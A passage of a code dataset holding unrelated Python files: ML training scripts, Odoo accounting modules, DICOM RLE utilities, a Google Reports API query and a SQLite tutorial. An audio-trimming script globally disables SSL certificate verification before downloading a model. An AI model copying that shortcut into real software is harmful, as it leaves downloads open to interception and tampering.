lr_find:\n learn.lr_find()\n fig = learn.recorder.plot(return_fig=True)\n fig.savefig('lr_figure_freezed_mixup.png')\n else:\n print('Training...')\n if lr_def == 0:\n lr = 1e-3\n else:\n lr = lr_def\n\n learn.fit_one_cycle(10, slice(lr), pct_start=0.9)\n learn.save('stage_1')\n print('Head training finished')\n\n learn.unfreeze()\n lrs = slice(lr / 400, lr / 4)\n learn.fit_one_cycle(12, lrs, pct_start=0.8)\n learn.save('stage_2')\n\n # Export model\n custom_export(model_dir, learn)\n\n # destroy learner\n learn.destroy()\n\n print('Training ' + 'fold ' + str(n_fold) + ' finished')\n n_fold += 1\n\n\nif __name__ == '__main__':\n\n # Load configuration file\n root = '../../'\n SERVABLE_CFG_FILE = root + 'config.ini'\n config = configparser.ConfigParser()\n config.read(SERVABLE_CFG_FILE)\n\n # Input params defined in config file\n seed = int(config['PARAMS']['SEED'])\n device = int(config['PARAMS']['DEVICE'])\n bs = int(config['PARAMS']['BS_SEG'])\n size = int(config['PARAMS']['IMG_SIZE'])\n k_folds = int(config['PARAMS']['K_FOLDS'])\n\n # Classes\n category_0 = config['TAXONOMY']['CATEGORY_0']\n category_1 = config['TAXONOMY']['CATEGORY_1']\n codes = [category_0, category_1]\n\n # Set the path to save the models\n model_dir_path_1 = 'MODEL_PATH_EXP1'\n model_dir_path_2 = 'MODEL_PATH_EXP2'\n\n # Set device\n torch.cuda.set_device(device)\n\n # Experiment 1\n # Get paths\n root_path = config['DATA']['DATASET_ROOT_PATH']\n path = root_path + 'LegitHealth-AD/'\n path_img = path + 'images/'\n path_label = path + 'labels/lesion_segmentation/ground_truth_masks/'\n get_y_fn = lambda x: path_label + f'{x.stem}.png'\n\n # Read image paths for K-fold\n all_images_paths = glob.glob(path_img + '*')\n all_images_paths = np.asarray(all_images_paths)\n\n # Training loop using K-fold strategy\n training_loop(path_img, model_dir_path_1, all_images_paths, codes, size, bs, get_y_fn, k_folds, seed)\n\n # Experiment 2\n # Get paths\n path = root_path + 'LegitHealth-V1-V2-V3'\n path_img = path + 'images/'\n path_label = path + 'labels/lesion_segmentation/ground_truth_masks/'\n get_y_fn = lambda x: path_label + f'{x.stem}.png'\n\n # Load only V3 images for K-fold\n path = root_path + 'LegitHealth-AD-FPK-IVI/'\n v3_image_paths = glob.glob(path + '*')\n v3_image_paths = np.asarray(v3_image_paths)\n\n training_loop(path_img, model_dir_path_2, v3_image_paths, codes, size, bs, get_y_fn, k_folds, seed)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"alfonmedela/ASCORAD","sub_path":"code/A_lesion_segmentation/train/main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"72335353437","text":"import sys\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nline = input().split()\nN = int(line[0])\nA = int(line[1])\nC = int(line[2])\nAC = A + C\n\nnbsteroid = [int(i) for i in input().split()]\n\n# cumsteroid = nbsteroid[:]\n# for i in range(1, N):\n# cumsteroid[i] += cumsteroid[i-1]\n\nclass ShieldSession:\n def __init__(self, next = None) -> None:\n self.next = next\n self.time = 0\n self.shift = 0\n\n def is_expired(self):\n return self.shift == AC\n\n def reset(self):\n self.time = 0\n\n def tick(self):\n if self.next != None:\n self.next.tick()\n if self.next.is_expired():\n self.next.reset()\n self.shift += 1\n\n else:\n self.shift += 1\n\n def protect(self):\n if self.time == AC + self.shift:\n return self.next.protect()\n result = (self, self.time < self.shift or self.time >= self.shift + A)\n self.time += 1\n return result\n\nbest = float(\"inf\")\n\nshield = None\nfor _ in range(N):\n shield = ShieldSession(shield)\n\nwhile not shield.is_expired():\n score = 0\n s = shield\n\n for i in range(N):\n eprint(\"arrivé\", i)\n s, unprotected = s.protect()\n if unprotected:\n score += nbsteroid[i]\n \n best = min(score, best)\n shield.tick()\n\nprint(best)","repo_name":"Dabsunter/BattleDev-S17","sub_path":"exo5.py","file_name":"exo5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31107664222","text":"# image_viewer.py\nimport io\nimport os\nimport img2pdf\nimport PySimpleGUI as sg\nfrom PIL import Image\nfile_types = [(\"JPEG (*.jpg)\", \"*.jpg\"),\n (\"All files (*.*)\", \"*.*\")]\ndef main():\n layout = [\n [sg.Image(key=\"-IMAGE-\")],\n [\n sg.Text(\"Image File\"),\n sg.Input(size=(25, 1), key=\"-FILE-\"),\n sg.FileBrowse(file_types=file_types),\n sg.Button(\"Load Image\"),\n sg.Button(\"Convert Image to .pdf\")\n ],\n ]\n window = sg.Window(\"Image Viewer\", layout)\n while True:\n event, values = window.read()\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n if event == \"Load Image\":\n filename = values[\"-FILE-\"]\n if os.path.exists(filename):\n image = Image.open(values[\"-FILE-\"])\n image.thumbnail((400, 400))\n bio = io.BytesIO()\n image.save(bio, format=\"PNG\")\n window[\"-IMAGE-\"].update(data=bio.getvalue())\n break\n break\n # if event == \"Convert Image to .pdf\":\n # with open(\"output.pdf\", \"wb\") as f:\n # f.write(img2pdf.convert([i for i in os.listdir('.')if i.endswith(\".jpg\")]))\n # break\n\n\n #window.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"DrewHall1/CodeLouPythonGUIconverter","sub_path":"viewer_two.py","file_name":"viewer_two.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"72113518238","text":"import gym\nimport numpy as np\n\ndef fitness(net):\n env = gym.make('CartPole-v1')\n obs = env.reset()\n obs=obs[0]\n done = False\n total_reward = 0\n while not done:\n \n action = net.forward(obs)\n action = np.argmax(action.flatten())\n\n obs, reward, trun,term, info = env.step(action)\n if trun or term:\n done = True\n total_reward += reward\n \n env.close()\n return total_reward\n","repo_name":"Joachm/enu_project_cpu","sub_path":"rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16160690062","text":"from odoo import models, fields\n\n\nclass L10nLatamDocumentType(models.Model):\n\n _inherit = 'l10n_latam.document.type'\n\n internal_type = fields.Selection(\n selection_add=[\n ('invoice', 'Invoices'),\n ('invoice_in', 'Purchase Invoices'),\n ('debit_note', 'Debit Notes'),\n ('credit_note', 'Credit Notes'),\n ('receipt_invoice', 'Receipt Invoice')])\n\n def _get_document_sequence_vals(self, journal):\n values = super(L10nLatamDocumentType, self)._get_document_sequence_vals(journal)\n if self.country_id != self.env.ref('base.cl'):\n return values\n values.update({\n 'padding': 6,\n 'implementation': 'no_gap',\n 'l10n_latam_document_type_id': self.id,\n 'prefix': None\n })\n return values\n\n def _filter_taxes_included(self, taxes):\n \"\"\" In Chile we include taxes in line amounts depending on type of document.\n This serves just for document printing purposes \"\"\"\n self.ensure_one()\n if self.country_id == self.env.ref('base.cl') and self.code in ['39', '41', '110', '111', '112', '34']:\n return taxes.filtered(lambda x: x.tax_group_id == self.env.ref('l10n_cl.tax_group_iva_19'))\n return super()._filter_taxes_included(taxes)\n","repo_name":"saifDiu/odoo_13_my_module","sub_path":"addons/l10n_cl/models/l10n_latam_document_type.py","file_name":"l10n_latam_document_type.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"9011678854","text":"import sys\r\nfrom random import randint\r\ndef ver(a,b):\r\n\tif(a>b):\r\n\t\tprint(\"Too high!\")\r\n\tif(a None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('notes', sa.Column('user_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'notes', 'users', ['user_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'notes', type_='foreignkey')\n op.drop_column('notes', 'user_id')\n # ### end Alembic commands ###\n","repo_name":"42musaev/elcode","sub_path":"backend/alembic/versions/75335e95ea22_created_relationship.py","file_name":"75335e95ea22_created_relationship.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"40365799641","text":"class graveDAO:\n def __init__(self, player, name, job, gold, runs, map, weapons, dungeon, dlevel, mon, looted):\n self.player = player\n self.name = name\n self.job = job\n self.gold = gold\n self.runs = runs\n self.map = map\n self.weapon = weapons\n self.dungeon = dungeon\n self.dlevel = dlevel\n self.mon = mon\n self.looted = looted\n","repo_name":"JenMart/DSR.02","sub_path":"app/models/graveyard.py","file_name":"graveyard.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74265718557","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\n\n\nclass AccountAbstractPayment(models.AbstractModel):\n _inherit = \"account.abstract.payment\"\n\n @api.model\n def _get_method_codes_using_bank_account(self):\n res = super(AccountAbstractPayment, self)._get_method_codes_using_bank_account()\n res.append('sepa_ct')\n return res\n\n\nclass AccountRegisterPayments(models.TransientModel):\n _inherit = \"account.register.payments\"\n\n partner_bank_account_id = fields.Many2one('res.partner.bank', string=\"Recipient Bank Account\")\n\n\n @api.onchange('payment_method_id')\n def _onchange_payment_method_id(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n if self._context.get('active_model') == 'account.invoice':\n invoice_ids = self._context.get('active_ids', [])\n partners = self.env['account.invoice'].browse(invoice_ids).mapped('partner_id')\n\n return {'domain':\n {'partner_bank_account_id': [('partner_id', 'in', partners.ids + partners.mapped('commercial_partner_id').ids)]}\n }\n\n\nclass AccountPayment(models.Model):\n _inherit = \"account.payment\"\n\n partner_bank_account_id = fields.Many2one('res.partner.bank', string=\"Recipient Bank Account\")\n\n @api.one\n @api.constrains('payment_method_id', 'journal_id')\n def _check_bank_account(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n if not self.journal_id.bank_account_id or not self.journal_id.bank_account_id.acc_type == 'iban':\n raise ValidationError(_(\"The journal '%s' requires a proper IBAN account to pay via SEPA. Please configure it first.\") % self.journal_id.name)\n if not self.journal_id.bank_account_id.bank_bic:\n raise ValidationError(_(\"The account '%s' (journal %s) requires a Bank Identification Code (BIC) to pay via SEPA. Please configure it first.\")\n % (self.journal_id.bank_account_id.acc_number, self.journal_id.name))\n\n @api.one\n @api.constrains('payment_method_id', 'partner_bank_account_id')\n def _check_partner_bank_account(self):\n if self.payment_method_id == self.env.ref('account_sepa.account_payment_method_sepa_ct'):\n # Note, the condition allows to use non-IBAN account. SEPA actually supports this under certain conditions\n if self.partner_bank_account_id.acc_type == 'iban' and not self.partner_bank_account_id.bank_bic:\n raise ValidationError(_(\"The partner account '%s' requires a Bank Identification Code (BIC) to pay via SEPA. Please configure it first.\") % self.partner_bank_account_id.acc_number)\n\n @api.onchange('destination_journal_id')\n def _onchange_destination_journal_id(self):\n if hasattr(super(AccountPayment, self), '_onchange_destination_journal_id'):\n super(AccountPayment, self)._onchange_destination_journal_id()\n if self.destination_journal_id:\n bank_account = self.destination_journal_id.bank_account_id\n self.partner_id = bank_account.company_id.partner_id\n self.partner_bank_account_id = bank_account\n","repo_name":"allanwong/odoo-ent12","sub_path":"odoo/addons/account_sepa/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7441159887","text":"\"\"\"Utility functions.\"\"\"\n\nimport sys\nfrom typing import Generator, Optional\n\nimport numpy as np\n\nfrom rle._rle import decode_frame, decode_segment, encode_frame, encode_segment\n\n\ndef decode_pixel_data(\n src: bytes, ds: Optional[\"Dataset\"] = None, **kwargs\n) -> \"np.ndarray\":\n \"\"\"Return the decoded RLE Lossless data as a :class:`numpy.ndarray`.\n\n Intended for use with *pydicom* ``Dataset`` objects.\n\n Parameters\n ----------\n src : bytes\n A single encoded image frame to be decoded.\n ds : pydicom.dataset.Dataset, optional\n A :class:`~pydicom.dataset.Dataset` containing the group ``0x0028``\n elements corresponding to the image frame. If not used then `kwargs`\n must be supplied.\n **kwargs\n Required keys if `ds` is not supplied:\n\n * ``\"rows\"``: :class:`int` - the number of rows in the decoded image\n * ``\"columns\"``: :class:`int` - the number of columns in the decoded\n image\n * ``\"bits_allocated\"``: :class:`int` - the number of bits allocated\n to each pixel\n\n Current decoding options are:\n\n * ``{'byteorder': str}`` specify the byte ordering for the decoded data\n when more than 8 bits per pixel are used, should be '<' for little\n endian ordering (default) or '>' for big-endian ordering.\n\n Returns\n -------\n numpy.ndarray\n A 1D array of ``numpy.uint8`` containing the decoded frame data,\n with planar configuration 1 and, by default, little-endian byte\n ordering.\n\n Raises\n ------\n ValueError\n If the decoding failed.\n \"\"\"\n byteorder = kwargs.get('byteorder', '<')\n\n columns = kwargs.get(\"columns\")\n rows = kwargs.get(\"rows\")\n bits_allocated = kwargs.get(\"bits_allocated\")\n no_kwargs = None in (columns, rows, bits_allocated)\n if ds is None and no_kwargs:\n raise ValueError(\"Either `ds` or `**kwargs` must be used\")\n\n columns = ds.get(\"Columns\", columns)\n rows = ds.get(\"Rows\", rows)\n bits_allocated = ds.get(\"BitsAllocated\", bits_allocated)\n\n return np.frombuffer(\n decode_frame(src, rows * columns, bits_allocated, byteorder),\n dtype='uint8'\n )\n\n\ndef encode_array(\n arr: \"np.ndarray\", ds: Optional[\"Dataset\"] = None, **kwargs\n) -> Generator[bytes, None, None]:\n \"\"\"Yield RLE encoded frames from `arr`.\n\n .. versionadded:: 1.1\n\n Parameters\n ----------\n arr : numpy.ndarray\n The array of data to be RLE encoded, should be ordered as (frames,\n rows, columns, planes), (rows, columns, planes), (frames, rows,\n columns) or (rows, columns).\n ds : pydicom.dataset.Dataset, optional\n The dataset corresponding to `arr` with matching values for *Rows*,\n *Columns*, *Samples per Pixel* and *Bits Allocated*. Required if\n the array properties aren't specified using `kwargs`.\n **kwargs\n Required keyword parameters if `ds` isn't used are:\n\n * ``'rows': int`` the number of rows contained in `src`\n * ``'columns': int`` the number of columns contained in `src`\n * ``samples_per_px': int`` the number of samples per pixel, either\n 1 for monochrome or 3 for RGB or similar data.\n * ``'bits_per_px': int`` the number of bits needed to contain each\n pixel, either 8, 16, 32 or 64.\n * ``'nr_frames': int`` the number of frames in `arr`, required if\n more than one frame is present.\n\n Yields\n ------\n bytes\n An RLE encoded frame from `arr`.\n \"\"\"\n byteorder = arr.dtype.byteorder\n if byteorder == '=':\n byteorder = '<' if sys.byteorder == \"little\" else '>'\n\n kwargs['byteorder'] = byteorder\n\n if ds:\n kwargs['rows'] = ds.Rows\n kwargs['columns'] = ds.Columns\n kwargs['samples_per_pixel'] = ds.SamplesPerPixel\n kwargs['bits_allocated'] = ds.BitsAllocated\n kwargs['number_of_frames'] = int(getattr(ds, \"NumberOfFrames\", 1) or 1)\n\n if kwargs['number_of_frames'] > 1:\n for frame in arr:\n yield encode_pixel_data(frame.tobytes(), **kwargs)\n else:\n yield encode_pixel_data(arr.tobytes(), **kwargs)\n\n\ndef encode_pixel_data(\n src: bytes,\n ds: Optional[\"Dataset\"] = None,\n byteorder: Optional[str] = None,\n **kwargs\n) -> bytes:\n \"\"\"Return `src` encoded using the DICOM RLE (PackBits) algorithm.\n\n .. versionadded:: 1.1\n\n .. warning::\n\n *Samples per Pixel* x *Bits Allocated* must be less than or equal\n to 15 in order to meet the requirements of the *RLE Lossless*\n transfer syntax.\n\n Parameters\n ----------\n src : bytes\n The data for a single image frame data to be RLE encoded.\n ds : pydicom.dataset.Dataset, optional\n The dataset corresponding to `src` with matching values for *Rows*,\n *Columns*, *Samples per Pixel* and *Bits Allocated*. Required if\n the frame properties aren't specified using `kwargs`.\n byteorder : str, optional\n Required if the samples per pixel is greater than 1. If `src` is in\n little-endian byte order then ``'<'``, otherwise ``'>'`` for\n big-endian.\n **kwargs\n If `ds` is not used then the following are required:\n\n * ``'rows': int`` the number of rows contained in `src`\n * ``'columns': int`` the number of columns contained in `src`\n * ``samples_per_pixel': int`` the number of samples per pixel, either\n 1 for monochrome or 3 for RGB or similar data.\n * ``'bits_allocated': int`` the number of bits needed to contain each\n pixel, either 8, 16, 32 or 64.\n\n Returns\n -------\n bytes\n The RLE encoded frame.\n \"\"\"\n if ds:\n r = ds.Rows\n c = ds.Columns\n bpp = ds.BitsAllocated\n spp = ds.SamplesPerPixel\n else:\n r = kwargs['rows']\n c = kwargs['columns']\n bpp = kwargs['bits_allocated']\n spp = kwargs['samples_per_pixel']\n\n # Validate input\n if spp not in [1, 3]:\n src = \"(0028,0002) 'Samples per Pixel'\" if ds else \"'samples_per_pixel'\"\n raise ValueError(src + \" must be 1 or 3\")\n\n if bpp not in [8, 16, 32, 64]:\n src = \"(0028,0100) 'Bits Allocated'\" if ds else \"'bits_allocated'\"\n raise ValueError(src + \" must be 8, 16, 32 or 64\")\n\n if bpp / 8 * spp > 15:\n raise ValueError(\n \"Unable to encode the data as the RLE format used by the DICOM \"\n \"Standard only allows a maximum of 15 segments\"\n )\n\n byteorder = '<' if bpp == 8 else byteorder\n if byteorder not in ('<', '>'):\n raise ValueError(\n \"A valid 'byteorder' is required when the number of bits per \"\n \"pixel is greater than 8\"\n )\n\n if len(src) != (r * c * bpp / 8 * spp):\n raise ValueError(\n \"The length of the data doesn't match the image parameters\"\n )\n\n return encode_frame(src, r, c, spp, bpp, byteorder)\n\n\ndef generate_frames(ds: \"Dataset\", reshape: bool = True) -> \"np.ndarray\":\n \"\"\"Yield a *Pixel Data* frame from `ds` as an :class:`~numpy.ndarray`.\n\n Parameters\n ----------\n ds : pydicom.dataset.Dataset\n The :class:`Dataset` containing an :dcm:`Image Pixel\n ` module and the *Pixel Data* to be\n converted.\n reshape : bool, optional\n If ``True`` (default), then the returned :class:`~numpy.ndarray` will\n be reshaped to the correct dimensions. If ``False`` then no reshaping\n will be performed.\n\n Yields\n -------\n numpy.ndarray\n A single frame of (7FE0,0010) *Pixel Data* as a little-endian ordered\n :class:`~numpy.ndarray` with an appropriate dtype for the data.\n\n Raises\n ------\n AttributeError\n If `ds` is missing a required element.\n NotImplementedError\n If the dataset's *Transfer Syntax UID* is not *RLE Lossless*.\n \"\"\"\n import numpy as np\n\n from pydicom.encaps import generate_pixel_data_frame\n from pydicom.pixel_data_handlers.util import pixel_dtype\n from pydicom.uid import RLELossless\n\n if ds.file_meta.TransferSyntaxUID != RLELossless:\n raise NotImplementedError(\n \"Only RLE Lossless encoded pixel data encoded is supported\"\n )\n\n # Check required elements\n required_elements = [\n \"BitsAllocated\", \"Rows\", \"Columns\", \"PixelRepresentation\",\n \"SamplesPerPixel\", \"PixelData\",\n ]\n missing = [elem for elem in required_elements if elem not in ds]\n if missing:\n raise AttributeError(\n \"Unable to convert the pixel data as the following required \"\n \"elements are missing from the dataset: \" + \", \".join(missing)\n )\n\n nr_frames = int(getattr(ds, \"NumberOfFrames\", 1) or 1)\n r = ds.Rows\n c = ds.Columns\n bpp = ds.BitsAllocated\n\n dtype = pixel_dtype(ds)\n for frame in generate_pixel_data_frame(ds.PixelData, nr_frames):\n arr = np.frombuffer(decode_frame(frame, r * c, bpp, '<'), dtype=dtype)\n\n if not reshape:\n yield arr\n continue\n\n if ds.SamplesPerPixel == 1:\n yield arr.reshape(ds.Rows, ds.Columns)\n else:\n # RLE is planar configuration 1\n arr = np.reshape(arr, (ds.SamplesPerPixel, ds.Rows, ds.Columns))\n yield arr.transpose(1, 2, 0)\n\n\ndef pixel_array(ds: \"Dataset\") -> \"np.ndarray\":\n \"\"\"Return the entire *Pixel Data* as an :class:`~numpy.ndarray`.\n\n Parameters\n ----------\n ds : pydicom.dataset.Dataset\n The :class:`Dataset` containing an :dcm:`Image Pixel\n ` module and the *RLE Lossless* encoded\n *Pixel Data* to be decoded.\n\n Returns\n -------\n numpy.ndarray\n The contents of (7FE0,0010) *Pixel Data* as a little-endian ordered\n :class:`~numpy.ndarray` with shape (rows, columns), (rows, columns,\n components), (frames, rows, columns), or (frames, rows, columns,\n components) depending on the dataset.\n \"\"\"\n from pydicom.pixel_data_handlers.util import (\n get_expected_length, reshape_pixel_array, pixel_dtype\n )\n\n expected_len = get_expected_length(ds, 'pixels')\n frame_len = expected_len // getattr(ds, \"NumberOfFrames\", 1)\n # Empty destination array for our decoded pixel data\n arr = np.empty(expected_len, pixel_dtype(ds))\n\n generate_offsets = range(0, expected_len, frame_len)\n for frame, offset in zip(generate_frames(ds, False), generate_offsets):\n arr[offset:offset + frame_len] = frame\n\n return reshape_pixel_array(ds, arr)\n\n\ndef pixel_data(arr: \"np.ndarray\", ds: \"Dataset\") -> bytes:\n \"\"\"Return `arr` as encapsulated and RLE encoded bytes.\n\n .. versionadded:: 1.1\n\n Parameters\n ----------\n arr : numpy.ndarray\n The :class:`~numpy.ndarray` to be encoded.\n ds : pydicom.dataset.Dataset\n The dataset corresponding to `arr` with matching values for *Rows*,\n *Columns*, *Samples per Pixel* and *Bits Allocated*.\n\n Returns\n -------\n bytes\n The encapsulated and RLE encoded `arr`, ready to be used to set\n the dataset's *Pixel Data* element.\n \"\"\"\n from pydicom.encaps import encapsulate\n\n return encapsulate([ii for ii in encode_array(arr, ds)])\n","repo_name":"Abith619/Abith619","sub_path":"pydicom/.dicom/lib/python3.9/site-packages/rle/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"15219962012","text":"from google.oauth2 import service_account\nimport googleapiclient.discovery\nimport json\n\n\ncredentials = service_account.Credentials.from_service_account_file(\n 'service_account.json',\n scopes=['https://www.googleapis.com/auth/admin.reports.audit.readonly', 'https://www.googleapis.com/auth/admin.reports.usage.readonly'],\n subject='nikolay.vaklinov@infinitelambda.com')\n\nservice = googleapiclient.discovery.build('admin', 'reports_v1', credentials=credentials)\nresults = service.userUsageReport().get(\n userKey='all', date='2020-08-01',\n parameters='gmail:num_emails_received,gmail:num_emails_sent,gmail:timestamp_last_access,gmail:timestamp_last_interaction',\n maxResults=1\n ).execute()\n\nprint('-'*200)\nprint(json.dumps(results, indent=2))","repo_name":"petero2018/LearnPythonRepo","sub_path":"Google_APIs/service_account_reports_api_with_user_usage.py","file_name":"service_account_reports_api_with_user_usage.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14556478895","text":"\"\"\"\nФильтрация данных\nУсловия - совпадение, диапазоны, вхождения, пустые значения\nКомбинации - логические операторы\n\"\"\"\n\nimport sqlite3\n\nwith sqlite3.connect(\"netflix.db\") as connection:\n cursor = connection.cursor()\n\n # query = \"\"\"\n # SELECT * - все столбцы\n # FROM netflix\n # WHERE director = 'Cristina Jacob'\n # lIMIT 10\n # OFFSET 10\n # \"\"\"\n\n # query = \"\"\"\n # SELECT director, duration - поиск по указанным столбцам\n # FROM netflix\n # WHERE director = 'Cristina Jacob'\n # AND duration > 110\n # \"\"\"\n\n # query = \"\"\"\n # SELECT *\n # FROM netflix\n # WHERE country = 'Russia' OR country = 'Romania' - так долго писать проще НИЖЕ пример\n # \"\"\"\n\n # query = \"\"\"\n # SELECT title, country\n # FROM netflix\n # WHERE country IN ('Russia', 'Romania') - а вот так лучше\n # \"\"\"\n\n # query = \"\"\"\n # SELECT title, country\n # FROM netflix\n # WHERE country LIKE 'R%' - (R% - начинается с буквы R\n # %R - Заканчивается на букву R\n # %R% - содержит в середине букву R)\n # \"\"\"\n\n # query = \"\"\"\n # SELECT title, country\n # FROM netflix\n # WHERE netflix.cast LIKE '%Maria%'\n # или\n # WHERE \"cast\" LIKE '%Maria%'\n # т.к. cast зарезервированное слово,\n # то можно использовать двойные кавычки (этот вариант используют чаще)\n # или указывать впереди через точку файл,\n # пример выше\n # \"\"\"\n\n # query = \"\"\"\n # SELECT \"cast\"\n # FROM netflix\n # WHERE release_year > 2000\n # \"\"\"\n\n # query = \"\"\"\n # SELECT release_year, title\n # FROM netflix\n # WHERE release_year <1950\n # \"\"\"\n\n # query = \"\"\"\n # SELECT \"cast\"\n # FROM netflix\n # WHERE release_year < 1950 AND release_year > 1945 - так долго писать проще НИЖЕ пример\n # \"\"\"\n\n # query = \"\"\"\n # SELECT \"cast\"\n # FROM netflix\n # WHERE release_year BETWEEN 1945 AND 1950 - а вот так лучше\n # BETWEEN работает как больше или равно и меньше или равно (учитывает границы промежутка)\n # \"\"\"\n\n # query = \"\"\"\n # SELECT release_year, title, director\n # FROM netflix\n # WHERE release_year BETWEEN 1945 AND 1950\n # AND director != '' - режисер не равен пустой строке\n # \"\"\"\n\n query = \"\"\"\n SELECT release_year, title, director\n FROM netflix\n WHERE director != '' - режисер не равен пустой строке, но строка есть, просто она пустая \n или \n WHERE direct IS NOT NULL - а вот такая запись говорит, что совсем пусто, т.е. там во всем столбце пусто вообще ничего не заполнено \n \"\"\"\n\n cursor.execute(query)\n\n for row in cursor.fetchall():\n print(row)","repo_name":"AnastasiaPliska/Homework__18","sub_path":"lessons/lesson_14/03-where.py","file_name":"03-where.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30839595039","text":"#!/usr/bin/env python\nimport ssl\nfrom pathlib import Path\n\nimport click\nimport torch\nfrom torchaudio.transforms import Resample\nfrom tqdm import tqdm\n\nSILERO_SAMPLE_RATE = 16_000\n\n\ndef align_timestamps(timestamps, fraction):\n result = []\n for stamp_dict in timestamps:\n result.append({\n \"start\": round(stamp_dict[\"start\"] * fraction),\n \"end\": round(stamp_dict[\"end\"] * fraction),\n })\n return result\n\n\n@click.command()\n@click.option(\"--input-dir\", type=str,\n help=\"Directory with audios to process.\")\n@click.option(\"--output-dir\", type=str, default=\"trimmed\",\n help=\"Directory for audios with pauses trimmed.\")\n@click.option(\"--target-sr\", type=int, default=48000,\n help=\"Sample rate of trimmed audios.\")\n@click.option(\"--audio-ext\", type=str, default=\"flac\",\n help=\"Extension of audio files.\")\ndef main(input_dir: str, output_dir: str, audio_ext: str, target_sr: int) -> None:\n \"\"\"Remove silence from audios.\"\"\"\n \n # Disables SSL cert check for urllib which will be called\n # in subsequent call of torch.hub.load\n ssl._create_default_https_context = ssl._create_unverified_context\n \n model, utils = torch.hub.load(\n repo_or_dir=\"snakers4/silero-vad\",\n model=\"silero_vad\",\n force_reload=False,\n )\n\n (\n _, # get_speech_ts\n get_speech_ts_adaptive,\n save_audio,\n read_audio,\n _, # state_generator\n _, # single_audio_stream\n collect_chunks\n ) = utils\n\n path = Path(input_dir)\n processed_path = Path(output_dir)\n processed_path.mkdir(exist_ok=True, parents=True)\n\n resampler = Resample(\n orig_freq=target_sr,\n new_freq=SILERO_SAMPLE_RATE,\n resampling_method=\"sinc_interpolation\",\n )\n resample_fraction = target_sr / SILERO_SAMPLE_RATE\n\n filepath_list = list(path.rglob(f\"*.{audio_ext}\"))\n print(f\"Number of audio files found: {len(filepath_list)}\")\n print(\"Performing pausation cutting...\")\n\n log_path = processed_path / \"pausation_cutting.log\"\n for filepath in tqdm(filepath_list):\n wave_tensor = read_audio(filepath, target_sr=target_sr)\n wave_resampled = resampler(wave_tensor)\n speech_timestamps = get_speech_ts_adaptive(wave_resampled, model)\n fixed_timestamps = align_timestamps(speech_timestamps, resample_fraction)\n speaker_dir = processed_path / filepath.parent.name\n speaker_dir.mkdir(exist_ok=True)\n try:\n save_audio(\n speaker_dir / filepath.name,\n collect_chunks(fixed_timestamps, wave_tensor),\n target_sr,\n )\n except RuntimeError:\n with open(log_path, \"a\") as fout:\n fout.write(str(filepath) + \"\\n\")\n\n print(\"Pausation cutting finished.\")\n print(f\"Trimmed files are located at {output_dir}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IMDxD/emotts","sub_path":"src/preprocessing/pausation_cutting.py","file_name":"pausation_cutting.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35012713015","text":"try:\n import importlib.util\nexcept Exception as e:\n print(e)\n \ndef load_tflite_model(model_path,use_TPU = False):\n # Import TensorFlow libraries\n # If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow\n # If using Coral Edge TPU, import the load_delegate library\n pkg = importlib.util.find_spec('tflite_runtime')\n if pkg:\n from tflite_runtime.interpreter import Interpreter\n if use_TPU:\n from tflite_runtime.interpreter import load_delegate\n else:\n from tensorflow.lite.python.interpreter import Interpreter\n if use_TPU:\n from tensorflow.lite.python.interpreter import load_delegate\n # Load the Tensorflow Lite model.\n # If using Edge TPU, use special load_delegate argument\n if use_TPU:\n interpreter = Interpreter(model_path=model_path,\n experimental_delegates=[load_delegate('libedgetpu.so.1',{})])\n else:\n interpreter = Interpreter(model_path=model_path)\n print(model_path)\n interpreter.allocate_tensors()\n return interpreter","repo_name":"wupanhao/lepi-ros-server","sub_path":"catkin_ws/src/pi_ai/include/pi_ai/load_runtime.py","file_name":"load_runtime.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32015205741","text":"from neuralnetwork import dataBase\nimport streamlit as 